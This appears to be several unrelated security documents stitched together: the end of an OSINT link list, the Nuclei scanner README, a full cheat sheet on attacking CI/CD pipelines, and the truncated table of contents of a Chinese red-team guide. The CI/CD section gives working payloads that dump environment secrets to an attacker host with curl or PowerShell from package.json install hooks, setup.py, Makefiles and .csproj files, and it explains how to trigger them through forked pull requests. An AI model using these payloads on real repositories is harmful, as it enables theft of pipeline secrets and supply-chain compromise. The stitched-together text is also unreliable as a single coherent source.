out](https://www.tech.gov.sg/media/technews/are-you-leaking-information-on-the-web) - [OSINT: Data Leaks and Data Breaches](https://www.osintguru.com/blog/osint-data-leaks-and-data-breaches) - [OSINT with gOSINT](https://brandefense.io/blog/osint-with-gosint/) - [List of OSINT Web Resources](https://github.com/OhShINT/ohshint.gitbook.io/blob/main/Lists_of_OSINT_Web_Resources/1-Complete-List-of-OSINT-Web-Resources.md) - [An OSINT/SOCMINT Mind-map](http://files.mtg-bi.com/MindMap.jpg) - [How to find - Robot](https://t.me/HowToFind) - [Password Game](https://neal.fun/password-game/) - [How to Use OSINT in Cybersecurity](https://www.molfar.global/en-blog/how-to-use-osint-in-cybersecurity) - [OSINT (OPEN-SOURCE INTELLIGENCE) - become hard to hack!](https://somprt.com/our-series/osint-open-source-intelligence/) - [GitHub OSINT Topic](https://github.com/topics/open-source-intelligence?o=desc&s=stars) - [SOCMINT – or rather OSINT of social media](https://research.securitum.com/socmint-or-rather-osint-of-social-media/) **More specific resources (external):** > **According to [Alessandra Adina](https://medium.com/@alessandraadina/how-to-do-cyber-reconnaissance-a-guide-to-osint-for-non-tech-professionals-da6c7db48699):** A term you may come across in the realm of OSINT is ‘grey literature.’ These are internal documents not intended for public use, but unfortunately, they can easily end up in places where they are searchable. Examples include technical reports, newsletters, invoices, business proposals, or requests for proposals. > Understanding the value of your organisation’s information, potential attack vectors, and who might be targeted in phishing attacks or other types of social engineering is essential. OSINT can aid you in assessing these risks and planning appropriate defences. - [OrienterNet Visual Localization in 2D Public Maps with Neural Matching](https://github.com/facebookresearch/OrienterNet) - [OSINT Tools - Airtable](https://airtable.com/embed/shrYXDdO1V5y33lIX/tblgDtMXI4fxtg9Op) - [OSINT - HUMINT](https://docs.google.com/spreadsheets/d/1JxBbMt4JvGr--G0Pkl3jP9VDTBunR2uD3_faZXDvhxc/edit#gid=1978517898) - [Ultimate OSINT](https://start.me/p/DPYPMz/the-ultimate-osint-collection) - [OSINT List](https://start.me/p/ZME8nR/osint) - [Curated OSINT List](https://start.me/p/7kxyy2/osint-tools-curated-by-lorand-bodo) - [OSINT Inception](https://start.me/p/Pwy0X4/osint-inception) - [Geolocation-OSINT](https://github.com/cqcore/Geolocation-OSINT) - [researchaide.org](https://www.researchaide.org/) - [botster.io/bots Crawling](https://botster.io/bots) - [Yet another awesome OSINT list](https://start.me/p/rx6Qj8/nixintel-s-osint-resource-list) - [Cryptocurrency OSINT](https://start.me/p/ek4rxK/cryptocurrency) - [Awesome On-Chain Investigations HandBook](https://github.com/OffcierCia/On-Chain-Investigations-Tools-List/blob/main/README.md) - [Investigator tools](https://start.me/p/gyaOJz/investigator-tools) - [A collection of several hundred online tools for OSINT](https://github.com/cipher387/osint_stuff_tool_collection) - [Rawsec's CyberSecurity Inventory](https://inventory.raw.pm/tools.html#title-tools-osint) - [OSINT-TOOLS-CLI](https://github.com/Coordinate-Cat/OSINT-TOOLS-CLI) - [Geoestimation](https://labs.tib.eu/geoestimation/) - [Using OSINT Search Engines To Collect Cyber Threat Intelligence](https://osintteam.blog/using-osint-search-engines-to-collect-cyber-threat-intelligence-3e9ace82eb64) - [GraphSense Maltego Transform](https://github.com/INTERPOL-Innovation-Centre/GraphSense-Maltego-transform) - [leakix.net](https://leakix.net/) - [Officer_CIA X MaxWayld: Content Overview](https://officercia.medium.com/officer-cia-x-maxwayld-content-overview-39fa3011a73f) - [Channels about OSINT, Hacking, Security and so on](https://graph.org/Channels-about-OSINT-Hacking-Security-and-so-on-04-19) - [Exploring the Dark Side: OSINT Tools and Techniques for Unmasking Dark Web Operations](https://www.sans.org/blog/exploring-the-dark-side-osint-tools-and-techniques-for-unmasking-dark-web-operations/) **Telegram + Discord: Security, OSINT, SOCMINT:** > According to [Ron Kaminsky](https://osintteam.blog/unveiling-the-digital-detective-essential-osint-tools-and-techniques-for-investigators-adf486ad2ccd): OSINT has revolutionized the world of investigations, empowering individuals and organizations to uncover valuable information, solve complex problems, and make informed decisions. [The ability to harness](https://osintteam.blog/unveiling-the-digital-detective-essential-osint-tools-and-techniques-for-investigators-adf486ad2ccd) the vast amount of data available in open sources has opened up new possibilities and transformed the investigative landscape. By utilizing OSINT tools effectively, investigators can save time, gather comprehensive information, and uncover connections that may have otherwise remained hidden. The techniques and methodologies explored in this guide provide a roadmap for conducting thorough and successful OSINT investigations. - [How to find the exact location of phone, tablet or PC](https://medium.com/@ibederov_en/how-to-find-the-exact-location-of-phone-tablet-or-pc-b953a60421a9) - [osint-mindset.gitbook.io](https://osint-mindset.gitbook.io) | Tip: Use [deepl.com](https://www.deepl.com/translator)! - [Discord OSINT Toolset](https://telegra.ph/Discord-OSINT-Toolset-04-11) - [DiscordOSINT](https://github.com/AtonceInventions/DiscordOSINT) - [Telegram OSINT](https://github.com/cqcore/Telegram-OSINT) - [OSINT Discord resources](https://github.com/Dutchosintguy/OSINT-Discord-resources) - [TelegramOnlineSpy](https://github.com/Forichok/TelegramOnlineSpy) - [Discord & Telegram OSINT references](https://github.com/Ginsberg5150/Discord-and-Telegram-OSINT-references) - [Awesome Discord](https://github.com/jacc/awesome-discord) - [Awesome Telegram OSINT](https://github.com/ItIsMeCall911/Awesome-Telegram-OSINT) - [Darvester](https://github.com/darvester/darvester) - [Telegram & Discord OpSec](https://officercia.mirror.xyz/dlf6ZEXq3FLE21ZY2jeJ0cBDyuZu8XIF9DEJAQ07nk8) - [Discord OpSec for servers](https://officercia.mirror.xyz/x4nGX6YwhhmHj8TaQ53kBR5b5M1Ei_Y9_l1Vpext-Hk) - [If you have been scammed…](https://officercia.mirror.xyz/X5Q0uPwvlgZ6BrvCmyqXlXHFgLAWrMtzAHSvjzrDS7c) **Check out my articles:** - [Navigation (my articles)](https://officercia.mirror.xyz/Uc1sf64yUCb0uo1DxR_nuif5EmMPs-RAshDyoAGEZZY) - [Original Article](https://officercia.mirror.xyz/5KSkJOTgMtvgC36v1GqZ987N-_Oj_zwvGatOk0A47Ws) - [OpSec Going Smart](https://officercia.mirror.xyz/fsRT9NC29GzeQAl-zvAMJ9L-hYUYvX1CPUkt97Vuuwo) - [OpSec Going Smarter](https://officercia.mirror.xyz/B9hBom4jGhkV0C-47E4YBz8tBJkb0a7zVwQR0jITIyM) - [OpSec Going Smarter: Secure Smartphones](https://officercia.mirror.xyz/0tlSSF2LDTOnnMN41R5Uc1kTpo-G-kXljn8pT0a1YLY) - [Choosing a Reliable VPN Provider for Life & Work](https://officercia.mirror.xyz/x91hTIDFrAL0lgqICRgWU7fLouuCMgvopQ9ZRvRXCLg) - [An ultimate list of rules any on-chain survivor should follow to stay safe!](https://officercia.mirror.xyz/_nD1Rtxe1PplK-NQzIq9sl-KNtajQG0aKqYsV36RTjA) - [QR Code: An Underestimated Danger](https://officercia.mirror.xyz/aN6giRkUsNd0o0bmjZVeZb2htkO_Ve16gMsARU6RBfM) - [The most significant milestones in the development of communications](https://officercia.mirror.xyz/G4782jMUpA_kkIpwakphbd6djX85cxRGS-pjBipc8Yk) - [How to win the war, trick the KGB and protect your crypto-assets from theft by Steganography](https://officercia.mirror.xyz/8ecJG-s_5E6J1t-h8gUNGqV3hbX8If-E5NnrFrOJHUA) - [Attacks via a Representative Sample : Myths and Reality](https://officercia.mirror.xyz/WeAilwJ9V4GIVUkYa7WwBwV2II9dYwpdPTp3fNsPFjo) - [How can you become a one-man-army OSINT specialist?](https://officercia.mirror.xyz/5KSkJOTgMtvgC36v1GqZ987N-_Oj_zwvGatOk0A47Ws) - [Telegram & Discord Security Best Practices](https://officercia.mirror.xyz/dlf6ZEXq3FLE21ZY2jeJ0cBDyuZu8XIF9DEJAQ07nk8) # Support Project Support is **very** important to me, with it I can spend less time at work and do what I love - educating DeFi & Crypto users :sparkling_heart: If you want to support my work, please consider donating me to the address: - **[0xB25C5E8fA1E53eEb9bE3421C59F6A66B786ED77A](https://etherscan.io/address/0xB25C5E8fA1E53eEb9bE3421C59F6A66B786ED77A)** — ERC20 & ETH [officercia.eth](https://etherscan.io/enslookup-search?search=officercia.eth) - **[17Ydx9m7vrhnx4XjZPuGPMqrhw3sDviNTU](https://blockchair.com/bitcoin/address/17Ydx9m7vrhnx4XjZPuGPMqrhw3sDviNTU)** - BTC - **4AhpUrDtfVSWZMJcRMJkZoPwDSdVG6puYBE3ajQABQo6T533cVvx5vJRc5fX7sktJe67mXu1CcDmr7orn1CrGrqsT3ptfds** - Monero XMR You can also send me a donation to the address from [this repository](https://github.com/OffcierCia/support)! **Check out as well:** - [My Blog on Mirror](https://officercia.mirror.xyz/UpFfG7-1E4SDJttnmuQ7v4BMc4KrCXzo80vtx7qV-YY) ### Thank you! 🙏 ---
<h1 align="center"> <img src="static/nuclei-logo.png" alt="nuclei" width="200px"></a> <br> </h1> [![License](https://img.shields.io/badge/license-MIT-_red.svg)](https://opensource.org/licenses/MIT) [![Go Report Card](https://goreportcard.com/badge/github.com/projectdiscovery/nuclei)](https://goreportcard.com/report/github.com/projectdiscovery/nuclei) [![contributions welcome](https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat)](https://github.com/projectdiscovery/nuclei/issues) [![GitHub Release](https://img.shields.io/github/release/projectdiscovery/nuclei)](https://github.com/projectdiscovery/nuclei/releases) [![Follow on Twitter](https://img.shields.io/twitter/follow/pdnuclei.svg?logo=twitter)](https://twitter.com/pdnuclei) [![Docker Images](https://img.shields.io/docker/pulls/projectdiscovery/nuclei.svg)](https://hub.docker.com/r/projectdiscovery/nuclei) [![Chat on Discord](https://img.shields.io/discord/695645237418131507.svg?logo=discord)](https://discord.gg/KECAGdH) <p align="center"> <a href="https://nuclei.projectdiscovery.io/templating-guide/" target="_blank"><img src="static/read-the-docs-button.png" height="42px"/></center></a> <a href="https://github.com/projectdiscovery/nuclei-templates" target="_blank"><img src="static/download-templates-button.png" height="42px"/></a> </p> Nuclei is a fast tool for configurable targeted scanning based on templates offering massive extensibility and ease of use. Nuclei is used to send requests across targets based on a template leading to zero false positives and providing effective scanning for known paths. Main use cases for nuclei are during initial reconnaissance phase to quickly check for low hanging fruits or CVEs across targets that are known and easily detectable. It uses [retryablehttp-go library](https://github.com/projectdiscovery/retryablehttp-go) designed to handle various errors and retries in case of blocking by WAFs, this is also one of our core modules from custom-queries. We have also [open-sourced a template repository](https://github.com/projectdiscovery/nuclei-templates) to maintain various type of templates, we hope that you will contribute there too. Templates are provided in hopes that these will be useful and will allow everyone to build their own templates for the scanner. Checkout the templating guide at [**nuclei.projectdiscovery.io**](https://nuclei.projectdiscovery.io/templating-guide/) for a primer on nuclei templates. ## Resources - [Features](#features) - [Installation Instructions](#installation-instructions) - [Nuclei templates](#nuclei-templates) - [Usage](#usage) - [Running nuclei](#running-nuclei) - [Rate Limits](#rate-limits) - [Template exclusion](#template-exclusion) - [Acknowledgments](#acknowledgments) ## Features <h1 align="left"> <img src="static/nuclei-run.png" alt="nuclei" width="700px"></a> <br> </h1> - Simple and modular code base making it easy to contribute. - Fast And fully configurable using a template based engine. - Handles edge cases doing retries, backoffs etc for handling WAFs. - Smart matching functionality for zero false positive scanning. ## Installation Instructions ### From Binary The installation is easy. You can download the pre-built binaries for your platform from the [Releases](https://github.com/projectdiscovery/nuclei/releases/) page. Extract them using tar, move it to your `$PATH`and you're ready to go. ```sh Download latest binary from https://github.com/projectdiscovery/nuclei/releases ▶ tar -xzvf nuclei-linux-amd64.tar.gz ▶ mv nuclei /usr/local/bin/ ▶ nuclei -version ``` ### From Source nuclei requires **go1.14+** to install successfully. Run the following command to get the repo - ```sh ▶ GO111MODULE=on go get -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei ``` ### From Github ```sh ▶ git clone https://github.com/projectdiscovery/nuclei.git; cd nuclei/v2/cmd/nuclei/; go build; mv nuclei /usr/local/bin/; nuclei -version ``` ## Nuclei templates You can download and update the nuclei templates using `update-templates` flag, `update-templates` flag downloads the latest release from **nuclei-templates** [Github project](https://github.com/projectdiscovery/nuclei-templates), a community curated list of templates that are ready to use. ```sh ▶ nuclei -update-templates ``` Additionally, you can write your own checks for your specific workflow and needs, please refer to **nuclei [templating guide](https://nuclei.projectdiscovery.io/templating-guide/) to write your own custom templates.** ## Usage ```sh nuclei -h ``` This will display help for the tool. Here are all the switches it supports. | Flag | Description | Example | | ---------------------- | --------------------------------------------------------- | ----------------------------------------------- | | bulk-size | Max hosts analyzed in parallel per template ( default 25) | nuclei -bulk-size 25 | | burp-collaborator-biid | Burp Collaborator BIID | nuclei -burp-collaborator-biid XXXX | | c | Max templates processed in parallel (default 10) | nuclei -c 10 | | l | List of urls to run templates | nuclei -l urls.txt | | target | Target to scan using Templates | nuclei -target hxxps://example.com | | t | Templates input file/files to check across hosts | nuclei -t git-core.yaml -t cves/ | | no-color | Don't Use colors in output | nuclei -no-color | | no-meta | Don't display metadata for the matches | nuclei -no-meta | | json | Prints and write output in json format | nuclei -json | | include-rr | Inlcude req/resp of matched output in JSON output | nuclei -json -include-rr | | o | File to save output result (optional) | nuclei -o output.txt | | project | Project flag to avoid sending same requests | nuclei -project | | project-path | Use a user defined project folder | nuclei -project -project-path test | | stats | Enable the progress bar (optional) | nuclei -stats | | silent | Show only found results in output | nuclei -silent | | retries | Number of times to retry a failed request | nuclei -retries 1 | | timeout | Seconds to wait before timeout (default 5) | nuclei -timeout 5 | | trace-log | File to write sent requests trace log | nuclei -trace-log logs | | rate-limit | Maximum requests/second (default 150) | nuclei -rate-limit 150 | | severity | Run templates based on severity | nuclei -severity critical,high | | stop-at-first-match | Stop processing http requests at first match | nuclei -stop-at-first-match | | exclude | Template input dir/file/files to exclude | nuclei -exclude panels -exclude tokens | | debug | Allow debugging of request/responses. | nuclei -debug | | update-templates | Download and updates nuclei templates | nuclei -update-templates | | update-directory | Directory for storing nuclei-templates(optional) | nuclei -update-directory templates | | tl | List available templates | nuclei -tl | | templates-version | Shows the installed nuclei-templates version | nuclei -templates-version | | v | Shows verbose output of all sent requests | nuclei -v | | version | Show version of nuclei | nuclei -version | | proxy-url | Proxy URL | nuclei -proxy-url hxxp://127.0.0.1:8080 | | proxy-socks-url | Socks proxyURL | nuclei -proxy-socks-url socks5://127.0.0.1:8080 | | random-agent | Use random User-Agents | nuclei -random-agent | | H | Custom Header | nuclei -H "x-bug-bounty: hacker" | ## Running Nuclei ### Running with single template. This will run `git-core.yaml` template against all the hosts in `urls.txt` and returns the matched results. ```sh ▶ nuclei -l urls.txt -t files/git-core.yaml -o results.txt ``` You can also pass the list of urls at standard input (STDIN). This allows for easy integration in automation pipelines. ```sh ▶ cat urls.txt | nuclei -t files/git-core.yaml -o results.txt ``` 💡 Nuclei accepts list of URLs as input, for example here is how `urls.txt` looks like:- ``` https://test.some-site.com http://vuls-testing.com https://test.com ``` ### Running with multiple templates. This will run the tool against all the urls in `urls.txt` with all the templates in the `cves` and `files` directory and returns the matched results. ```sh ▶ nuclei -l urls.txt -t cves/ -t files/ -o results.txt ``` ### Running with subfinder. ```sh ▶ subfinder -d hackerone.com -silent | httpx -silent | nuclei -t cves/ -o results.txt ``` ### Running in Docker container You can use the [nuclei dockerhub image](https://hub.docker.com/r/projectdiscovery/nuclei). Simply run - ```sh ▶ docker pull projectdiscovery/nuclei ``` After downloading or building the container, run the following: ```sh ▶ docker run -it projectdiscovery/nuclei ``` For example, this will run the tool against all the hosts in `urls.txt` and output the results to your host file system: ```sh ▶ cat urls.txt | docker run -v /path/to/nuclei-templates:/app/nuclei-templates -v /path/to/nuclei/config:/app/.nuclei-config.json -i projectdiscovery/nuclei -t /app/nuclei-templates/files/git-config.yaml > results.txt ``` Remember to change `/path-to-nuclei-templates` to the real path on your host file system. ### Rate Limits Nuclei have multiple rate limit controls for multiple factors including a number of templates to execute in parallel, a number of hosts to be scanned in parallel for each template, and the global number of request / per second you wanted to make/limit using nuclei, as an example here is how all this can be controlled using flags. - `-c` flag => Limits the number of templates processed in parallel. - `-bulk-size` flag => Limits the number of hosts processed in parallel for each template. - `-rate-limit` flag => Global rate limiter that ensures defined number of requests/second across all templates. If you wanted go fast or control the scans, feel free to play with these flags and numbers, `rate-limit` always ensure to control the outgoing requests regardless the other flag you are using. ### Template Exclusion [Nuclei-templates](https://github.com/projectdiscovery/nuclei-templates) includes multiple checks including many that are useful for attack surface mapping and not necessarily a security issue, in cases where you only looking to scan few specific templates or directory, here are few options / flags to filter or exclude them from running. #### Running templates with exclusion We do not suggest running all the nuclei-templates directory at once, in case of doing so, one can make use of `exclude` flag to exclude specific directory or templates to ignore from scanning. ```sh nuclei -l urls.txt -t nuclei-templates -exclude panels/ -exclude technologies -exclude files/wp-xmlrpc.yaml ``` Note:- both directory and specific templates case be excluded from scan as shared in the above example. #### Running templates based on severity You can run the templates based on the specific severity of the template, single and multiple severity can be used for scan. ```sh nuclei -l urls.txt -t cves/ -severity critical,medium ``` The above example will run all the templates under `cves` directory with `critical` and `medium` severity. ```sh nuclei -l urls.txt -t panels/ -t technologies -severity info ``` The above example will run all the templates under `panels` and `technologies` directory with **severity** marked as `info` #### Using `.nuclei-ignore` file for template exclusion Since release of nuclei [v2.1.1](https://github.com/projectdiscovery/nuclei/releases/tag/v2.1.1), we have added support of `.nuclei-ignore` file that works along with `update-templates` flag of nuclei, in **.nuclei-ignore** file, you can define all the template directory or template path that you wanted to exclude from all the nuclei scans, to start using this feature, make sure you installed nuclei templates using `nuclei -update-templates` flag, now you can add/update/remove templates in the file that you wanted to exclude from running. ``` nano ~/nuclei-templates/.nuclei-ignore ``` Default **nuclei-ignore** list can be accessed from [here](https://github.com/projectdiscovery/nuclei-templates/blob/master/.nuclei-ignore), in case you don't want to exclude anything, simply remove the `.nuclei-ignore` file. * * * ### 📋 Notes - Progress bar is experimental feature, might not work in few cases. - Progress bar doesn't work with workflows, numbers are not accurate due to conditional execution. ## Acknowledgments Do also check out these similar awesome projects that may fit in your workflow: [Burp Suite](https://portswigger.net/burp), [FFuF](https://github.com/ffuf/ffuf), [Jaeles](https://github.com/jaeles-project/jaeles), [Qsfuzz](https://github.com/ameenmaali/qsfuzz), [Inception](https://github.com/proabiral/inception), [Snallygaster](https://github.com/hannob/snallygaster), [Gofingerprint](https://github.com/Static-Flow/gofingerprint), [Sn1per](https://github.com/1N3/Sn1per/tree/master/templates), [Google tsunami](https://github.com/google/tsunami-security-scanner), [ChopChop](https://github.com/michelin/ChopChop) -------- nuclei is made with 🖤 by the [projectdiscovery](https://projectdiscovery.io) team. Community contributions have made the project what it is. See the **[Thanks.md](https://github.com/projectdiscovery/nuclei/blob/master/THANKS.md)** file for more details.
# CI/CD attacks > CI/CD pipelines are often triggered by untrusted actions such a forked pull requests and new issue submissions for public git repositories.\ > These systems often contain sensitive secrets or run in privileged environments.\ > Attackers may gain an RCE into such systems by submitting crafted payloads that trigger the pipelines.\ > Such vulnerabilities are also known as Poisoned Pipeline Execution (PPE) ## Summary - [CI/CD attacks](#cicd-attacks) - [Summary](#summary) - [Tools](#tools) - [Package managers & Build Files](#package-managers--build-files) - [Javascript / Typescript - package.json](#javascript--typescript---packagejson) - [Python - setup.py](#python---setuppy) - [Bash / sh - *.sh](#bash--sh---sh) - [Maven / Gradle](#maven--gradle) - [BUILD.bazel](#buildbazel) - [Makefile](#makefile) - [Rakefile](#rakefile) - [C# - *.csproj](#c---csproj) - [CI/CD products](#cicd-products) - [GitHub Actions](#github-actions) - [Azure Pipelines (Azure DevOps)](#azure-pipelines-azure-devops) - [CircleCI](#circleci) - [Drone CI](#drone-ci) - [BuildKite](#buildkite) - [References](#references) ## Tools * [praetorian-inc/gato](https://github.com/praetorian-inc/gato) - GitHub Self-Hosted Runner Enumeration and Attack Tool ## Package managers & Build Files > Code injections into build files are CI agnostic and therefore they make great targets when you don't know what system builds the repository, or if there are multiple CI's in the process.\ > In the examples below you need to either replace the files with the sample payloads, or inject your own payloads into existing files by editing just a part of them.\n > If the CI builds forked pull requests then your payload may run in the CI. ### Javascript / Typescript - package.json > The `package.json` file is used by many Javascript / Typescript package managers (`yarn`,`npm`,`pnpm`,`npx`....). > The file may contain a `scripts` object with custom commands to run.\ `preinstall`, `install`, `build` & `test` are often executed by default in most CI/CD pipelines - hence they are good targets for injection.\ > If you come across a `package.json` file - edit the `scripts` object and inject your instruction there NOTE: the payloads in the instructions above must be `json escaped`. Example: ```json { "name": "my_package", "description": "", "version": "1.0.0", "scripts": { "preinstall": "set | curl -X POST --data-binary @- {YourHostName}", "install": "set | curl -X POST --data-binary @- {YourHostName}", "build": "set | curl -X POST --data-binary @- {YourHostName}", "test": "set | curl -X POST --data-binary @- {YourHostName}" }, "repository": { "type": "git", "url": "https://github.com/foobar/my_package.git" }, "keywords": [], "author": "C.Norris" } ``` ### Python - setup.py > `setup.py` is used by python's package managers during the build process. It is often executed by default.\ > Replacing the setup.py files with the following payload may trigger their execution by the CI. ```python import os os.system('set | curl -X POST --data-binary @- {YourHostName}') ``` ### Bash / sh - *.sh > Shell scripts in the repository are often executed in custom CI/CD pipelines.\ > Replacing all the `.sh` files in the repo and submitting a pull request may trigger their execution by the CI. ```shell set | curl -X POST --data-binary @- {YourHostName} ``` ### Maven / Gradle > These package managers come with "wrappers" that help with running custom commands for building / testing the project.\ These wrappers are essentially executable shell/cmd scripts. Replace them with your payloads to have them executed: - `gradlew` - `mvnw` - `gradlew.bat` (windows) - `mvnw.cmd` (windows) > Occasionally the wrappers will not be present in the repository.\ > In such cases you can edit the `pom.xml` file, which instructs maven what dependencies to fetch and which `plugins` to run.\ > Some plugins allow code execution, here's an example of the common plugin `org.codehaus.mojo`.\ > If the `pom.xml` file you're targeting already contains a `<plugins>` instruction then simply add another `<plugin>` node under it.\ > If if **doesn't** contain a `<plugins>` node then add it under the `<build>` node. NOTE: remember that your payload is inserted in an XML document - XML special characters must be escaped. ```xml <build> <plugins> <plugin> <groupId>org.codehaus.mojo</groupId> <artifactId>exec-maven-plugin</artifactId> <version>1.6.0</version> <executions> <execution> <id>run-script</id> <phase>validate</phase> <goals> <goal>exec</goal> </goals> </execution> </executions> <configuration> <executable>bash</executable> <arguments> <argument> -c </argument> <argument>{XML-Escaped-Payload}</ argument> </arguments> </configuration> </plugin> </plugins> </build> ``` ### BUILD.bazel > Replace the content of `BUILD.bazel` with the following payload NOTE: `BUILD.bazel` requires escaping backslashes.\ Replace any `\` with `\\` inside your payload. ```shell genrule( name = "build", outs = ["foo"], cmd = "{Escaped-Shell-Payload}", visibility = ["//visibility:public"], ) ``` ### Makefile > Make files are often executed by build pipelines for projects written in `C`, `C++` or `Go` (but not exclusively).\ > There are several utilities that execute `Makefile`, the most common are `GNU Make` & `Make`.\ > Replace your target `Makefile` with the following payload ```shell .MAIN: build .DEFAULT_GOAL := build .PHONY: all all: set | curl -X POST --data-binary @- {YourHostName} build: set | curl -X POST --data-binary @- {YourHostName} compile: set | curl -X POST --data-binary @- {YourHostName} default: set | curl -X POST --data-binary @- {YourHostName} ``` ### Rakefile > Rake files are similar to `Makefile` but for Ruby projects.\ > Replace your target `Rakefile` with the following payload ```shell task :pre_task do sh "{Payload}" end task :build do sh "{Payload}" end task :test do sh "{Payload}" end task :install do sh "{Payload}" end task :default => [:build] ``` ### C# - *.csproj > `.csproj` files are build file for the `C#` runtime.\ > They are constructed as XML files that contain the different dependencies that are required to build the project.\ > Replacing all the `.csproj` files in the repo with the following payload may trigger their execution by the CI. NOTE: Since this is an XML file - XML special characters must be escaped. ```powershell <Project> <Target Name="SendEnvVariables" BeforeTargets="Build;BeforeBuild;BeforeCompile"> <Exec Command="powershell -Command &quot;$envBody = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes((Get-ChildItem env: | Format-List | Out-String))); Invoke-WebRequest -Uri {YourHostName} -Method POST -Body $envBody&quot;" /> </Target> </Project> ``` ## CI/CD products ### GitHub Actions The configuration files for GH actions are located in the directory `.github/workflows/`\ You can tell if the action builds pull requests based on its trigger (`on`) instructions: ```yaml on: push: branches: - master pull_request: ``` In order to run an OS command in an action that builds pull requests - simply add a `run` instruction to it.\ An action may also be vulnerable to command injection if it dynamically evaluates untrusted input as part of its `run` instruction: ```yaml jobs: print_issue_title: runs-on: ubuntu-latest name: Print issue title steps: - run: echo "${{github.event.issue.title}}" ``` ### Azure Pipelines (Azure DevOps) The configuration files for azure pipelines are normally located in the root directory of the repository and called - `azure-pipelines.yml`\ You can tell if the pipeline builds pull requests based on its trigger instructions. Look for `pr:` instruction: ```yaml trigger: branches: include: - master - refs/tags/* pr: - master ``` ### CircleCI The configuration files for CircleCI builds are located in `.circleci/config.yml`\ By default - CircleCI pipelines don't build forked pull requests. It's an opt-in feature that should be enabled by the pipeline owners. In order to run an OS command in a workflow that builds pull requests - simply add a `run` instruction to the step. ```yaml jobs: build: docker: - image: cimg/base:2022.05 steps: - run: echo "Say hello to YAML!" ``` ### Drone CI The configuration files for Drone builds are located in `.drone.yml`\ Drone build are often self-hosted, this means that you may gain excessive privileges to the kubernetes cluster that runs the runners, or to the hosting cloud environment. In order to run an OS command in a workflow that builds pull requests - simply add a `commands` instruction to the step. ```yaml steps: - name: do-something image: some-image:3.9 commands: - {Payload} ``` ### BuildKite The configuration files for BuildKite builds are located in `.buildkite/*.yml`\ BuildKite build are often self-hosted, this means that you may gain excessive privileges to the kubernetes cluster that runs the runners, or to the hosting cloud environment. In order to run an OS command in a workflow that builds pull requests - simply add a `command` instruction to the step. ```yaml steps: - label: "Example Test" command: echo "Hello!" ``` ## References * [Poisoned Pipeline Execution](https://www.cidersecurity.io/top-10-cicd-security-risks/poisoned-pipeline-execution-ppe/) * [DEF CON 25 - spaceB0x - Exploiting Continuous Integration (CI) and Automated Build systems](https://youtu.be/mpUDqo7tIk8) * [Azure-Devops-Command-Injection](https://pulsesecurity.co.nz/advisories/Azure-Devops-Command-Injection)
Author: [Evi1cg](https://twitter.com/Evi1cg) Blog: https://evi1cg.github.io Table of Contents ================= - [Table of Contents](#table-of-contents) - [信息搜集](#信息搜集) - [开源情报信息收集(OSINT)](#开源情报信息收集osint) - [github](#github) - [whois查询/注册人反查/邮箱反查/相关资产](#whois查询注册人反查邮箱反查相关资产) - [google hacking](#google-hacking) - [创建企业密码字典](#创建企业密码字典) - [字典列表](#字典列表) - [密码生成](#密码生成) - [邮箱列表获取](#邮箱列表获取) - [泄露密码查询](#泄露密码查询) - [对企业外部相关信息进行搜集](#对企业外部相关信息进行搜集) - [子域名获取](#子域名获取) - [进入内网](#进入内网) - [基于企业弱账号漏洞](#基于企业弱账号漏洞) - [基于系统漏洞进入](#基于系统漏洞进入) - [网站应用程序渗透](#网站应用程序渗透) - [无线Wi-Fi接入](#无线wi-fi接入) - [隐匿攻击](#隐匿攻击) - [Command and Control](#command-and-control) - [Fronting](#fronting) - [代理](#代理) - [内网跨边界应用](#内网跨边界应用) - [内网跨边界转发](#内网跨边界转发) - [内网跨边界代理穿透](#内网跨边界代理穿透) - [EW](#ew) - [Termite](#termite) - [代理脚本](#代理脚本) - [shell反弹](#shell反弹) - [内网文件的传输和下载](#内网文件的传输和下载) - [搭建 HTTP server](#搭建-http-server) - [内网信息搜集](#内网信息搜集) - [本机信息搜集](#本机信息搜集) - [1、用户列表](#1用户列表) - [2、进程列表](#2进程列表) - [3、服务列表](#3服务列表) - [4、端口列表](#4端口列表) - [5、补丁列表](#5补丁列表) - [6、本机共享](#6本机共享) - [7、本用户习惯分析](#7本用户习惯分析) - [8、获取当前用户密码工具](#8获取当前用户密码工具) - [Windows](#windows) - [Linux](#linux) - [浏览器](#浏览器) - [其他](#其他) - [扩散信息收集](#扩散信息收集) - [端口扫描](#端口扫描) - [常用端口扫描工具](#常用端口扫描工具) - [内网拓扑架构分析](#内网拓扑架构分析) - [常见信息收集命令](#常见信息收集命令) - [第三方信息收集](#第三方信息收集) - [权限提升](#权限提升) - [Windows](#windows-1) - [BypassUAC](#bypassuac) - [常用方法](#常用方法) - [常用工具](#常用工具) - [提权](#提权) - [Linux](#linux-1) - [内核溢出提权](#内核溢出提权) - [计划任务](#计划任务) - [SUID](#suid) - [系统服务的错误权限配置漏洞](#系统服务的错误权限配置漏洞) - [不安全的文件/文件夹权限配置](#不安全的文件文件夹权限配置) - [找存储的明文用户名,密码](#找存储的明文用户名密码) - [权限维持](#权限维持) - [系统后门](#系统后门) - [Windows](#windows-2) - [1、密码记录工具](#1密码记录工具) - [2、常用的存储Payload位置](#2常用的存储payload位置) - [3、Run/RunOnce Keys](#3runrunonce-keys) - [4、BootExecute Key](#4bootexecute-key) - [5、Userinit Key](#5userinit-key) - [6、Startup Keys](#6startup-keys) - [7、Services](#7services) - [8、Browser Helper Objects](#8browser-helper-objects) - [9、AppInit\_DLLs](#9appinit_dlls) - [10、文件关联](#10文件关联) - [11、bitsadmin](#11bitsadmin) - [12、mof ](#12mof-) - [13、wmi](#13wmi) - [14、Userland Persistence With Scheduled Tasks](#14userland-persistence-with-scheduled-tasks) - [15、Netsh](#15netsh) - [16、Shim](#16shim) - [17、DLL劫持](#17dll劫持) - [18、DoubleAgent ](#18doubleagent-) - [19、waitfor.exe ](#19waitforexe-) - [20、AppDomainManager](#20appdomainmanager) - [21、Office](#21office) - [22、CLR](#22clr) - [23、msdtc](#23msdtc) - [24、Hijack CAccPropServicesClass and MMDeviceEnumerato](#24hijack-caccpropservicesclass-and-mmdeviceenumerato) - [25、Hijack explorer.exe](#25hijack-explorerexe) - [26、Windows FAX DLL Injection](#26windows-fax-dll-injection) - [27、特殊注册表键值](#27特殊注册表键值) - [28、快捷方式后门](#28快捷方式后门) - [29、Logon Scripts](#29logon-scripts) - [30、Password Filter DLL](#30password-filter-dll) - [31、利用BHO实现IE浏览器劫持](#31利用bho实现ie浏览器劫持) - [Linux](#linux-2) - [crontab](#crontab) - [硬链接sshd](#硬链接sshd) - [SSH 